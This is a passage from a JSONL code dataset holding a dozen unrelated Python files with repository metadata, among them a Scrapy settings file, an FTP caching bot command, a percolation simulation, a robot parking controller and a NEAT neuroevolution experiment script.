Hin, Win = 100, 10, 32, 32\n KernelSize = 4\n\n X = randn(N, C, Hin, Win, requires_grad=True, device=device)\n module = extend(MaxPool2d(KernelSize)).to(device=device)\n out = module(X)\n\n Hout = int(Hin / KernelSize)\n Wout = int(Win / KernelSize)\n vout = randn(N, C, Hin, Win, device=device)\n vin = randn(N, C, Hout, Wout, device=device)\n\n return {\n \"X\": X,\n \"module\": module,\n \"output\": out,\n \"vout_ag\": vout,\n \"vout_bp\": vout.view(N, -1, 1),\n \"vin_ag\": vin,\n \"vin_bp\": vin.view(N, -1, 1),\n }\n","sub_path":"test/benchmark/jvp_maxpool2d.py","file_name":"jvp_maxpool2d.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"42877469","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nimport zerorpc\nfrom jiebarpc.dispatcher import JiebaRPCDispatcher\n\n\nclass JiebaRPCServer(zerorpc.Server):\n def __init__(self, methods=None, *args, **kwargs):\n methods = methods or JiebaRPCDispatcher()\n super(JiebaRPCServer, self).__init__(\n methods,\n *args,\n **kwargs\n )\n\n\nif __name__ == '__main__':\n server = JiebaRPCServer()\n server.bind('tcp://0.0.0.0:4242')\n server.run()\n","sub_path":"jiebarpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"534865240","text":"# -*- coding: utf-8 -*-\nimport os\n\n# Scrapy settings for nhs project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# https://doc.scrapy.org/en/latest/topics/settings.html\n# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'nhs'\n\nSPIDER_MODULES = ['nhs.spiders']\nNEWSPIDER_MODULE = 'nhs.spiders'\n\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n# USER_AGENT = 'nhs (+http://www.yourdomain.com)'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = True\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n#CONCURRENT_REQUESTS = 32\n\n# Configure a delay for requests for the same website (default: 0)\n# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\n# DOWNLOAD_DELAY = 3\n# The download delay setting will honor only one of:\n# CONCURRENT_REQUESTS_PER_DOMAIN = 16\n# CONCURRENT_REQUESTS_PER_IP = 16\n\n# Disable cookies (enabled by default)\n# COOKIES_ENABLED = False\n\n# Disable Telnet Console (enabled by default)\n# TELNETCONSOLE_ENABLED = False\n\n# Override the default request headers:\n# DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n# }\n\n# Enable or disable spider middlewares\n# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n# SPIDER_MIDDLEWARES = {\n# 'nhs.middlewares.NhsSpiderMiddleware': 543,\n# }\n\n# Enable or disable downloader middlewares\n# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n# DOWNLOADER_MIDDLEWARES = {\n# 'nhs.middlewares.NhsDownloaderMiddleware': 543,\n# }\n\n# Enable or disable extensions\n# See https://doc.scrapy.org/en/latest/topics/extensions.html\n# EXTENSIONS = {\n# 'scrapy.extensions.telnet.TelnetConsole': None,\n# }\n\n# Configure item pipelines\n# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nITEM_PIPELINES = {\n 'scrapy.pipelines.files.FilesPipeline': 10,\n# 'nhs.pipelines.MongoPipeline': 20,\n 'nhs.pipelines.KafkaPipeline': 15\n # 'nhs.pipelines.DoNothingPipeline': 1,\n}\n\nFILES_STORE = os.environ.get('FILES_STORE', '/home/pjmd/tmp/nhs/files')\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See https://doc.scrapy.org/en/latest/topics/autothrottle.html\n# AUTOTHROTTLE_ENABLED = True\n# The initial download delay\n# AUTOTHROTTLE_START_DELAY = 5\n# The maximum download delay to be set in case of high latencies\n# AUTOTHROTTLE_MAX_DELAY = 60\n# The average number of requests Scrapy should be sending in parallel to\n# each remote server\n# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0\n# Enable showing throttling stats for every response received:\n# AUTOTHROTTLE_DEBUG = False\n\n# Enable and configure HTTP caching (disabled by default)\n# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n# HTTPCACHE_ENABLED = True\n# HTTPCACHE_EXPIRATION_SECS = 0\n# HTTPCACHE_DIR = 'httpcache'\n# HTTPCACHE_IGNORE_HTTP_CODES = []\n# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n\n# MONGO\nMONGO_URI = os.environ.get('MONGO_URI', 'mongodb://127.0.0.1:27017/')\nMONGO_DATABASE = 'nhsdb'\nVALIDATE = False\n# KAFKA\nKAFKA_HOST = os.environ.get('KAFKA_HOST', 'localhost')\nKAFKA_PORT = os.environ.get('KAFKA_PORT', 9092)\nTOPIC = 'scrapypipe'\nBULK_SEND = True if os.environ.get('BULK_SEND', 'False').lower() in ['true', 'yes'] else False\nBULK_SIZE = os.environ.get('BULK_SIZE', 100)\n# VALIDATION_SCHEMA = {\n# 'validator': {\n# '$jsonSchema': {\n# 'bsonType': \"object\",\n# 'required': [ \"category\", \"Formulations\", \"Medicine\", \"unit\", \"period\", \"Pack_Size\", \"VMPP_Snomed_Code\", \"Basic_Price\" ],\n# 'properties': {\n# 'Medicine': {\n# 'bsonType': \"string\",\n# 'description': \"must be a string and is required\"\n# },\n# 'Basic_Price': {\n# 'bsonType': \"float\",\n# 'description': \"must be a float and is required\"\n# }\n# }\n# }\n# }\n# }\nVALIDATION_SCHEMA = {\n 'validator': {\n '$jsonSchema': [\n {'bsonType': \"object\"},\n {'required': [\"category\", \"Formulations\", \"Medicine\", \"unit\", \"period\", \"Pack_Size\", \"VMPP_Snomed_Code\",\n \"Basic_Price\"]},\n {'properties': {\n 'Medicine': [\n ('bsonType', \"string\"),\n ('description', \"must be a string and is required\")\n ],\n 'Basic_Price': [\n ('bsonType', \"float\"),\n ('description', \"must be a float and is required\")\n ]\n }\n }\n ]\n }\n}\n","sub_path":"nhs/nhs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"436744377","text":"from twisted.internet import reactor\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.internet.protocol import ClientCreator\nfrom twisted.protocols.ftp import FTPClient, FTPFileListProtocol\nfrom lib.utils import cache\nimport fnmatch, os\n\nconfig = {\n \"access\": \"admin\",\n \"help\": \".cache [filter] [showname] || .cache premux eotena || Caches the premux for a show so that .chapters, .xdelta and .release work faster\",\n \"reversible\": False\n}\n\n@inlineCallbacks\ndef command(self, user, channel, msg):\n if len(msg) < 2:\n self.msg(channel, \"Need a filter and show name\")\n return\n name_filter, show = msg[0], \" \".join(msg[1:])\n show = self.factory.resolve(show, channel)\n if show is None:\n return\n if not show[\"folder\"]:\n self.msg(channel, \"No FTP folder given for {}\".format(show[\"series\"]))\n return\n episode = show[\"current_ep\"] + 1\n\n ftp = yield ClientCreator(reactor, FTPClient, self.factory.config.ftp_user, self.factory.config.ftp_pass).connectTCP(self.factory.config.ftp_host, self.factory.config.ftp_port)\n ftp.changeDirectory(\"/{}/{:02d}/\".format(show[\"folder\"], episode))\n filelist = FTPFileListProtocol()\n yield ftp.list(\".\", filelist)\n files = [x[\"filename\"] for x in filelist.files if x[\"filetype\"] != \"d\"]\n premux = fnmatch.filter(files, \"*{}*.mkv\".format(name_filter))\n\n if not premux:\n self.msg(channel, \"No premux found\")\n return\n elif len(premux) > 1:\n self.msg(channel, \"Too many premux files match the filter: {}\".format(\", \".join(premux)))\n return\n else:\n premux = premux[0]\n premux_len = [x[\"size\"] for x in filelist.files if x[\"filename\"] == premux][0]\n\n\n if os.path.isfile(\"{}/{}\".format(self.factory.config.premux_dir, premux)):\n self.msg(channel, \"{} already is cached. Message fugi if you need it re-cached.\".format(premux))\n return\n\n success = yield cache(self, user, ftp, premux, premux_len)\n\n if success:\n self.msg(channel, \"{} cached.\".format(premux))\n else:\n self.msg(channel, \"Caching of {} failed.\".format(premux))\n\n yield ftp.quit()\n ftp.fail(None)\n","sub_path":"commands/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"236624582","text":"from collections import deque\ntc = int(input())\nfor t in range(tc):\n N, K = map(int,input().split())\n l1 = list(input())\n bar = N//4\n vktodehlstn = []\n\n for i in range(bar+1):\n if i == 0:\n for j in range(4):\n b = \"\".join(l1[ bar*j : j*bar+bar ])\n vktodehlstn.append(b)\n else:\n a = l1.pop()\n l1.insert(0,a)\n for j in range(4):\n b = \"\".join(l1[ bar*j : j*bar+bar ])\n vktodehlstn.append(b)\n\n\n vktodehlstn = list(set(vktodehlstn))\n vktodehlstn.sort(reverse=True)\n X = \"0x\" + vktodehlstn[K-1]\n h = int(X, 16)\n print(\"#\",t+1,' ',h, sep='')\n \n ","sub_path":"SWEA/SWEA_5658.py","file_name":"SWEA_5658.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"223437670","text":"import sys\nimport math\nimport os.path\n\nfrom soar.robot.pioneer import PioneerRobot\nfrom soar.hooks import tkinter_hook, is_gui, sim_completed\nfrom soar.gui.plot_window import PlotWindow\nfrom soar.sim.geometry import normalize_angle_180\nfrom soar.client import brain_path\nimport lib601.markov as markov\nfrom lib601.dist import *\n\nimport beliefGraph\nimport idealReadings\n\n####################################################################\n###\n### Preliminaries -- do not change the following code\n###\n####################################################################\n\nrobot = PioneerRobot()\n\nlab_path = os.path.dirname(brain_path)\nWORLD_FILE = os.path.join(lab_path,'baseWorld.py')\nFORWARD_VELOCITY = 0.2 # meters / second\nTIMESTEP_LENGTH = 0.1 # seconds\n\n\n# Where the robot will be in the world\n(x_min, x_max) = (0, 6.08)\nrobotY = y = 0.5\n\n# Distance and Gain for Wall Following\ndesired_right = 0.5\nKp,Ka = (10.0,2.)\n\n# Maximum \"good\" sonar reading\nsonar_max = 1.5\n\n#method to discretize values into boxes of size grid_size\ndef discretize(value, grid_size, max_bin=float('inf'), value_min = 0):\n return min(int(((value or sonar_max) - value_min)/grid_size), max_bin)\n\n#method to clip x to be within lo and hi limits, inclusive\ndef clip(x, lo, hi):\n return max(lo, min(x, hi))\n\n####################################################################\n###\n### Probabilistic Models -- you may change this code\n###\n####################################################################\n\n# Number of discrete locations and discrete observations\nnum_states = 40\nnum_observations = 12\n\n# compatibility for some students who got the old names\nnumStates = num_states\nnumObservations = num_observations\nimport lib601.dist as dist\n\n\ndef obs_model(s):\n tilt = triangle_dist(ideal[s],num_observations//6, 0, num_observations-1)\n wall = uniform_dist(range(num_observations))\n p = .95\n final_dist = mixture(tilt, wall, p)\n return final_dist\n\ndef trans_model(s):\n delta_pos = FORWARD_VELOCITY * robot.direction * TIMESTEP_LENGTH\n width = (x_max - x_min)/(num_states-1)\n delta = delta_pos/width\n p = abs(delta - int(delta))\n if s+int(delta) >= num_states-1:\n new_dist = {num_states-1:1}\n## elif s+int(delta) <= 0:\n## new_dist = {0:1}\n elif robot.direction == 1: \n new_dist = {clip(s+int(delta), 0, num_states-1):1-p, clip(s+int(delta)+1, 0, num_states-1):p}\n elif robot.direction == -1:\n new_dist = {clip(s+int(delta), 0, num_states-1):1-p, clip(s+int(delta)-1, 0, num_states-1):p}\n \n return DDist(new_dist)\n\n\ndef confident_location(belief):\n s_true = belief.max_prob_elt()\n width = (x_max - x_min)/(num_states-1)\n state_range = int((0.45/2)// width)\n sum_prob = 0\n for i in range(s_true-state_range, state_range+s_true):\n sum_prob += belief.prob(i)\n if sum_prob > 0.75:\n return (s_true, True)\n return (-1, False) \n\n\nuniform_init_dist = square_dist(0, num_states)\n\nREAL_ROBOT = True\n\n######################################################################\n###\n### Brain Methods -- do not change the following code\n###\n######################################################################\n\n# Robot's Ideal Readings\n#ideal = idealReadings.compute_ideal_readings(WORLD_FILE, x_min, x_max, robotY, num_states, num_observations)\nideal = [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n\ndef get_parking_spot(ideal):\n avg = sum(ideal)/float(len(ideal))\n i = len(ideal)-1\n print('len(idea)', len(ideal))\n print('avg = ', avg)\n while i>0 and ideal[i]>avg:\n i -= 1\n print('i=', i)\n j = i\n while j>0 and ideal[j] avg and i > 0 and ideal[i-1] < avg:\n in_room = i\n if ideal[i] < avg and ideal[i-1] > avg and i > 0:\n out_room = i\n count_rooms += 1\n if count_rooms == table:\n return (in_room + out_room-1)/2\n return (in_room + out_room -1)/2\n \ndef on_step(step_duration):\n sonars = robot.sonars\n (px, py, ptheta) = robot.pose\n width = (x_max - x_min)/(num_states-1)\n if robot.confident:\n print('x: ', robot.pose.x)\n (location, _) = confident_location(robot.estimator.belief)\n print('Im parking')\n table_state = get_desired_table_state(ideal, robot.table)\n table_location = table_state * width + x_min\n robot.direction = (table_state - location)/abs(table_state - location)\n (distance_right, theta) = robot.get_distance_right_and_angle()\n if not theta:\n theta = 0\n e = (desired_right-distance_right)*robot.direction\n ROTATIONAL_VELOCITY = Kp*e - Ka*theta\n if abs(table_location - robot.pose.x) > width*.1 and robot.back_ward:\n robot.fv = FORWARD_VELOCITY * robot.direction\n robot.rv = ROTATIONAL_VELOCITY #* robot.direction\n elif abs(table_location - robot.pose.x) < width*.1 and robot.back_ward:\n robot.fv = 0\n robot.back_ward = False\n robot.rotate = True\n if robot.rotate: \n if abs(robot.pose[2] - 3.14/2) > .09:\n #robot.rv = 0.2 * (robot.pose[2] - 90)\n robot.rv = .2\n else:\n robot.rotate = False\n robot.park = True\n if robot.park:\n if sonars[4] > .2:\n robot.fv = .2\n robot.rv = 0 \n else:\n robot.fv = 0\n robot.rv = 0\n print('I parked')\n return\n\n \n # Quality metric. Important to do this before we update the belief state, because\n # it is always a prediction\n if not REAL_ROBOT:\n parkingSpaceSize = .75\n robotWidth = 0.3\n margin = (parkingSpaceSize - robotWidth) / 2\n robot.probMeasures.append(estimate_quality_measure(robot.estimator.belief,\n x_min, x_max, num_states, margin, px))\n true_state = discretize(px, (x_max - x_min)/num_states, value_min = x_min)\n true_state = clip(true_state, 0, num_states-1)\n n = len(robot.probMeasures)\n\n # current discretized sonar reading\n left = discretize(sonars[0], sonar_max/num_observations, num_observations-1)\n if not REAL_ROBOT:\n robot.data.append((true_state, ideal[true_state], left))\n # obsProb\n obsProb = sum([robot.estimator.belief.prob(s) * obs_model(s).prob(left)\n for s in range(num_states)])\n\n # GRAPHICS\n if robot.g is not None:\n # draw robot's true state\n if not REAL_ROBOT:\n if true_state < num_states:\n robot.g.updateDist()\n robot.g.updateTrueRobot(true_state)\n # update observation model graph\n robot.g.updateObsLabel(left)\n robot.g.updateObsGraph([obs_model(s).prob(left)\n for s in range(num_states)])\n\n robot.estimator.update(left)\n (location, robot.confident) = confident_location(robot.estimator.belief)\n \n # GRAPHICS\n if robot.g is not None:\n # update world drawing\n # update belief graph\n robot.g.updateBeliefGraph([robot.estimator.belief.prob(s)\n for s in range(num_states)])\n # DL3 Angle Controller\n (distance_right, theta) = robot.get_distance_right_and_angle()\n if not theta:\n theta = 0\n e = desired_right-distance_right\n ROTATIONAL_VELOCITY = Kp*e - Ka*theta\n robot.fv = FORWARD_VELOCITY * robot.direction\n robot.rv = ROTATIONAL_VELOCITY \n## robot.rv = 1\ndef on_shutdown():\n pass\n\ndef estimate_quality_measure(belief, x_min, x_max, num_states, delta, true_x):\n min_good = max(true_x - delta, x_min)\n max_good = min(true_x + delta, x_max)\n state_size = (x_max - x_min) / num_states\n min_good_discrete = max(0, discretize(min_good, state_size, value_min = x_min))\n max_good_discrete = min(num_states-1,\n discretize(max_good, state_size, value_min = x_min)) + 1\n\n min_good_reconstituted = min_good_discrete * state_size + x_min\n max_good_reconstituted = max_good_discrete * state_size + x_min\n\n frac_low_bin_in_range = 1 - ((min_good - min_good_reconstituted) / state_size)\n frac_high_bin_in_range = 1 - ((max_good_reconstituted - max_good) / state_size)\n\n total = sum(belief.prob(s) for s in range(min_good_discrete+1, max_good_discrete))\n lowP = belief.prob(min_good_discrete) * frac_low_bin_in_range\n highP = belief.prob(max_good_discrete) * frac_high_bin_in_range\n return total + lowP + highP\n","sub_path":"src/old_files/parkingBrain_park.py","file_name":"parkingBrain_park.py","file_ext":"py","file_size_in_byte":10107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"273194460","text":"import neat \nimport neat.nn\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport sys,os\nsys.path.append('../pureples/')\nfrom pureples.shared.substrate import Substrate\nfrom pureples.shared.visualize import draw_net,draw_es\nfrom pureples.es_hyperneat.es_hyperneat import ESNetwork\nimport numpy as np\nimport statistics\nsys.path.insert(0, 'evoman')\nfrom environment import Environment\n\nfrom tqdm import tqdm\nfrom neat_feed_forward_controller import player_controller\nenemy = str(sys.argv[1]) if len(sys.argv)> 1 else 6 \n\ndef eval_fitness(genomes, config):\n sum = 0\n max = -9999999\n c = 0\n global max_f\n global max_g\n \n fs = []\n for idx, genome in tqdm(genomes):\n \n cppn = neat.nn.FeedForwardNetwork.create(genome, config)\n # plot = draw_net(cppn, filename=experiment_name+\"/es_hyperneat_xor_medium_cppn\")\n # plot.view()\n network = ESNetwork(sub, cppn, params)\n # if c %10 ==0:\n\n # net = network.create_phenotype_network(filename=experiment_name+'/substrate.jpg')\n # else:\n net = network.create_phenotype_network()\n \n # draw_es(id_to_coords, network.connections, experiment_name+'/substrate')\n env.player_controller =player_controller( net)\n c +=1\n f,p,e,t = env.play(pcont=genome)\n if f > max_f:\n max_f = f\n max_g = genome\n\n genome.fitness = f\n fs.append(f)\n sum += f\n # exit()\n if f>max:\n max_g = genome\n max = f\n mean = np.sum(fs) / c\n std = statistics.stdev(fs)\n with open(experiment_name+'/'+'my_log.txt','a') as f:\n f.write('mean,'+str(mean)+',max,'+str(max)+',std,'+str(std)+'\\r')\n# Create the population and run the XOR task by providing the above fitness function.\ndef run(gens):\n pop = neat.population.Population(config)\n stats = neat.statistics.StatisticsReporter()\n pop.add_reporter(stats)\n pop.add_reporter(neat.reporting.StdOutReporter(True))\n\n winner = pop.run(eval_fitness, gens)\n # print(\"es_hyperneat_xor_medium done\")\n return winner, stats\n\n\n# If run as script.\nif __name__ == '__main__':\n headless = True\n if headless:\n os.environ[\"SDL_VIDEODRIVER\"] = \"dummy\"\n input_coordinates = [(-3.0 , 4.0),(-3.0 , 3.0),(-3.0 , 2.0),(-3.0 , 1.0),\n (-3.0 , -1.0),(-3.0 , -2.0),(-3.0 , -3.0),(-3.0 , -4.0),\n (3.0 , 4.0),(3.0 , 3.0),(3.0 , 2.0),(3.0 , 1.0),\n (3.0 , -1.0),(3.0 , -2.0),(3.0 , -3.0),(3.0 , -4.0),\n (0.0 , 4.0),(0.0 , 2.0),(0.0 , -4.0),(0.0 , -2.0)]\n\n output_coordinates = [(-2.0, 5.0),(-1.0, 5.0),(0.0, 5.0),(1.0, 5.0),(2.0, 5.0),]\n\n for i in range(10):\n \n experiment_name = 'hyper_enemy'+ str(enemy)+'multi'+str(i)\n if not os.path.exists(experiment_name):\n os.makedirs(experiment_name)\n env = Environment(experiment_name=experiment_name,\n enemies=[enemy],\n playermode=\"ai\",\n player_controller=player_controller,\n enemymode=\"static\",\n level=2,\n speed=\"fastest\",\n randomini=\"yes\" )\n global max_f \n max_f = -9999\n global max_g \n max_g = None\n sub = Substrate(input_coordinates, output_coordinates)\n\n # ES-HyperNEAT specific parameters.\n params = {\"initial_depth\": 1,\n \"max_depth\": 2,\n \"variance_threshold\": 0.03,\n \"band_threshold\": 0.3,\n \"iteration_level\": 1,\n \"division_threshold\": 0.5,\n \"max_weight\": 8.0,\n \"activation\": \"sigmoid\"}\n\n # Config for CPPN.\n config = neat.config.Config(neat.genome.DefaultGenome, neat.reproduction.DefaultReproduction,\n neat.species.DefaultSpeciesSet, neat.stagnation.DefaultStagnation,\n 'config_cppn')\n\n winner = run(int(sys.argv[2]) if len(sys.argv)>2 else 50)[0]\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Verify network output against training data.\n print('\\nOutput:')\n cppn = neat.nn.FeedForwardNetwork.create(winner, config)\n network = ESNetwork(sub, cppn, params)\n winner_net = network.create_phenotype_network(filename=experiment_name+'/es_hyperneat_xor_medium_winner.png') # This will also draw winner_net.\n with open(experiment_name+'/winner_genome.pkl','wb')as f:\n\n pickle.dump(winner,f)\n f.close()\n with open(experiment_name+'/my_winner_genome_'+str(int(max_f))+'.pkl','wb')as f:\n\n pickle.dump(max_g,f)\n f.close()\n # Save CPPN if wished reused and draw it to file.\n draw_net(cppn, filename=experiment_name+\"/es_hyperneat_xor_medium_cppn\")\n with open(experiment_name+'/es_hyperneat_xor_medium_cppn.pkl', 'wb') as output:\n pickle.dump(cppn, output, pickle.HIGHEST_PROTOCOL)\n\n","sub_path":"specialist_hyperneat_multirun.py","file_name":"specialist_hyperneat_multirun.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"616542116","text":"from datetime import date\nfrom pytest import fixture\nfrom .models import User, Trip\n\n\n@fixture\ndef user() -> User:\n return User(username=\"Dummy\", email=\"dummy@dummy.dm\", password=\"password\")\n\n\ndef test_user_create(user: User):\n assert user\n\n\n@fixture\ndef trip() -> Trip:\n test_date = date.fromisoformat(\"2021-03-30\")\n return Trip(\n user_id=1,\n departure=\"Angers\",\n departure_id=\"admin:fr:49007\",\n arrival=\"Toulouse\",\n arrival_id=\"admin:fr:31555\",\n date=test_date,\n )\n\n\ndef test_trip_create(trip: Trip):\n assert trip\n","sub_path":"app/application/models_test.py","file_name":"models_test.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"222428443","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom algorithm import WeightedQuickUnionUF\nfrom random import Random\nfrom time import time\nimport sys\nfrom pdf import crearPDF\nfrom mail import envio_mail\n\n\nclass PercolationSimulation(object):\n\n def __init__(self, N, rseed=None):\n self.N = N\n # La grilla es de N * N, pero se agregan dos componentes virtuales\n self.qu = WeightedQuickUnionUF(N * N + 2, debug=False)\n self.virt_top = N * N\n self.virt_bottom = N * N + 1\n\n # Usamos un hack: hay dos nodos virtuales en WQU, una para cada borde\n # Conectamos todos los nodos de cada borde a su nodo virtual, luego checkeamos si ambos nodos son conexos\n # Si esto es True, el sistema percola\n for i in range(N):\n self.qu.union(N * N, i) # El nodo N * N es virtual top\n for i in range(N * N - N, N * N):\n self.qu.union(N * N + 1, i) # El nodo N * N + 1 es virtual bottom\n\n self.open = [False] * (N * N) # Indica si el nodo esta abierto o no\n self.rng = Random(rseed) if rseed else Random()\n\n def adyacentes(self, p):\n # Retorna los id de los nodos abiertos adyacentes a p\n adyacentes = []\n izq = p - 1\n derecha = p + 1\n arriba = p - self.N\n abajo = p + self.N\n\n # Checkea a los vecinos del nodo, viendo si realmente son vecinos, y\n # estan abiertos\n for nodo in (izq, derecha, arriba, abajo):\n if 0 < nodo < self.N * self.N and self.open[nodo]:\n adyacentes.append(nodo)\n return adyacentes\n\n def _percola(self): # Si ambos nodos virtuales son conexos, bingo!\n return self.qu.connected(self.virt_top, self.virt_bottom)\n\n def umbral(self):\n cerrados = range(self.N * self.N) # Todos los sitios parten cerrados\n # Hacemos un shuffle, para ir abriendo sitios aleatoriamente\n self.rng.shuffle(cerrados)\n\n while cerrados:\n nodo = cerrados.pop()\n self.open[nodo] = True # Se abre el nodo\n vecinos = self.adyacentes(nodo) # Se obtienen los nodos adyacentes\n\n # Se establece un enlace entre el nodo y cada nodo adyacente\n for vecino in vecinos:\n self.qu.union(nodo, vecino)\n\n if self._percola():\n break # Si el sistema percola, terminamos\n abiertos = float(self.N ** 2 - len(cerrados))\n\n # La estimación del umbral de percolación\n return abiertos / (self.N * self.N)\n\n\nif __name__ == '__main__':\n ST = time()\n enfe = int(sys.argv[1])\n cont = 0\n dist = int(sys.argv[2])\n N = int(sys.argv[3])\n mail = str(sys.argv[4])\n nombre = str(sys.argv[5])\n SAMPLE_SIZE = 385\n estimated_threshold = []\n mean = 0.0\n variance = 0.0\n if enfe == 1: # quillay\n cont = 39\n if enfe == 2: # peumo\n cont = 35\n if enfe == 3: # boldo\n cont = 32\n if enfe == 4: # roble\n cont = 10\n if enfe == 5: # rauli\n cont = 20\n pass\n for i in range(SAMPLE_SIZE):\n percolacion = PercolationSimulation(N)\n estimado = percolacion.umbral()\n mean += estimado\n estimated_threshold.append(estimado)\n mean /= SAMPLE_SIZE\n for x in estimated_threshold:\n variance += (x - mean) ** 2\n variance /= (SAMPLE_SIZE - 1)\n mean = (mean * cont) / 100\n mean = 1 - mean\n T = (time() - ST)\n crearPDF(enfe, dist, N, mean, T, nombre)\n envio_mail(mail, nombre)\n","sub_path":"Programa/Percolacion/enfer/sec.py","file_name":"sec.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227962205","text":"server_roles = (\n ('LINMN01', 'OA Management Node on Linux.'),\n ('BALINBE', 'BA Database Server on Linux.'),\n ('BALINFE', 'BA Application Server on Linux.'),\n ) \n\noperating_systems = (\n ('WIN60', 'Windows Server 2008'),\n ('WIN61', 'Windows Server 2008 R2'),\n ('WIN62', 'Windows Server 2012'),\n ('WIN63', 'Windows Server 2012 R2'),\n ('CENTOS5', 'CentOS 5'),\n ('CENTOS6', 'CentOS 6'),\n ('CENTOS7', 'CentOS 7'),\n ('CLIN5', 'Cloud Linux 5'),\n ('CLIN6', 'Cloud Linux 6'),\n )\n\narchitecture = (\n ('x86', '32 bits architecture'),\n ('x86_64', '64 bits architecture'),\n )","sub_path":"servers/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"436760701","text":"# -*- coding=utf -*-\nfrom .common import decamelize, to_identifier, coalesce_options\nfrom collections import defaultdict\n\n_default_modules = {\n \"stores\": {\n \"sql\":\"cubes.backends.sql.store\",\n \"mongo\":\"cubes.backends.mongo\",\n \"mongo2\":\"cubes.backends.mongo2\",\n \"mixpanel\":\"cubes.backends.mixpanel.store\",\n \"slicer\":\"cubes.backends.slicer.store\",\n },\n \"browsers\": {\n \"snowflake\":\"cubes.backends.sql.browser\",\n \"snapshot\": \"cubes.backends.sql.browser\",\n \"mixpanel\":\"cubes.backends.mixpanel.browser\",\n \"slicer\":\"cubes.backends.slicer.browser\",\n },\n \"model_providers\": {\n \"mixpanel\":\"cubes.backends.mixpanel.store\",\n \"slicer\":\"cubes.backends.slicer.store\",\n },\n \"request_log_handlers\": {\n \"sql\":\"cubes.backends.sql.logging\",\n },\n \"authorizers\": {\n }\n}\n\nclass Namespace(dict):\n def __init__(self, name, objects=None, root_class=None, suffix=None,\n option_checking=False):\n self.name = name\n self.root_class = root_class\n self.suffix = suffix\n self.option_checking = option_checking\n\n if objects:\n self.update(objects)\n\n def discover_objects(self):\n if self.root_class:\n objects = collect_subclasses(self.root_class, self.suffix)\n\n if self.option_checking:\n # Convert classes to factories\n for name, class_ in objects.items():\n objects[name] = _FactoryOptionChecker(class_)\n\n self.update(objects)\n\n def __getattr__(self, value):\n return self.__getitem__(value)\n\n def __getitem__(self, value):\n try:\n return super(Namespace, self).__getitem__(value)\n except KeyError:\n # Lazily load module that might contain the object\n modules = _default_modules.get(self.name)\n if modules and value in modules:\n _load_module(modules[value])\n self.discover_objects()\n\n # Retry after loading\n return super(Namespace, self).__getitem__(value)\n\nclass _FactoryOptionChecker(object):\n def __init__(self, class_, options=None):\n \"\"\"Creates a factory wrapper for `class_`. Calling the object createds\n an instance of `class_` and configures it according to `options`. If\n not options are specified, then the class variable `__options__` is used.\n\n The options is a list of dictionaries with keys:\n\n * `name` – option name\n * `type` – option data type\n * `description` – description (optional)\n * `label` – human readable label (optional)\n * `values` – valid values for the option.\"\"\"\n\n if not options and hasattr(class_, \"__options__\"):\n options = class_.__options__\n\n self.options = {}\n self.option_types = {}\n for option in options or []:\n name = option[\"name\"]\n self.options[name] = option\n self.option_types[name] = option.get(\"type\", \"string\")\n\n self.class_ = class_\n\n def __call__(self, *args, **kwargs):\n # TODO: move this to a metaclass\n options = dict(kwargs)\n options = coalesce_options(dict(kwargs), self.option_types)\n\n return self.class_(*args, **options)\n\n_namespaces = {}\n\ndef get_namespace(name):\n \"\"\"Gets a namespace `name` dictionary.\"\"\"\n\n return _namespaces.get(name)\n\ndef initialize_namespace(name, objects=None, root_class=None, suffix=None,\n option_checking=False):\n \"\"\"Initializes the namespace `name` with `objects` dictionary and\n subclasses of `root_class` where the class name is decamelized, changet do\n an identifier and with `suffix` removed.\"\"\"\n\n ns = Namespace(name, objects, root_class, 